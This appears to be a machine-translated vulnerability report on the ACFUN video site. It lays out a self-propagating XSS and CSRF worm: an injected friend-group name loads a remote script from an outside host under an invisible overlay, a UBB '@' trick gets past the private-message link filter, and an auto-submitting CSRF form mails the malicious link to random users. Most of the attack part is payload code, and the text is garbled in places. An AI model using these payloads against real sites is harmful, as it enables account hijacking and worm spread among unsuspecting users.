XSS + CSRF provides detailed analysis and Breakthrough measures for ACFUN users' persistent hijacking and self-propagation.

User center friend group location:

X "x =" x

There is a length check on the page, but it doesn't matter. packet capture structure:

Name = addGroup & groupName = x "onmouseover =" var h = document. getElementsByTagName ('head') [0]; var s = document. createElement ('script'); s. src = 'HTTP: // 126.am/ 70Qdp3 '; h. appendChild (s); "id =" xss "style =" position: absolute; top: 0px; left: 0px; z-index: 999; padding: 1000px; filter: alpha (opacity = 0);-moz-opacity: 0; opacity: 0 ;"

 

Effect:

Js content:

Alert ('xss script ');
$ ("# Xss"). remove ();

 

The following uses self-propagation:

The private message function in the user center can send links. The links are filtered and can only be linked to the acfun. TV Domain Name:

However, UBB can be constructed to bypass:

[Url = http://www.acfun. TV @ 126.am/ n6ccT0] http://www.acfun. TV /v/ac634542#/url]

Simultaneously http://www.acfun. TV /api/mail.aspx? Name = newMail location no source verification:

<Html>
<Body>
<Form id = "csrf" name = "csrf" action = "http://www.acfun. TV /api/mail.aspx? Name = newMail "method =" POST ">
<Input type = "hidden" name = "userId" value = "<? Php echo rand (,);?> "/>
<Input type = "hidden" name = "content" value = "[url = http://www.acfun. TV @ 126.am/ n6ccT0] http://www.acfun. TV /v/ac634542#/url]"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. csrf. submit ();
</Script>
</Body>
</Html>

One-stop hijacking of notifications ...:

 

 

Solution:

You know me better ..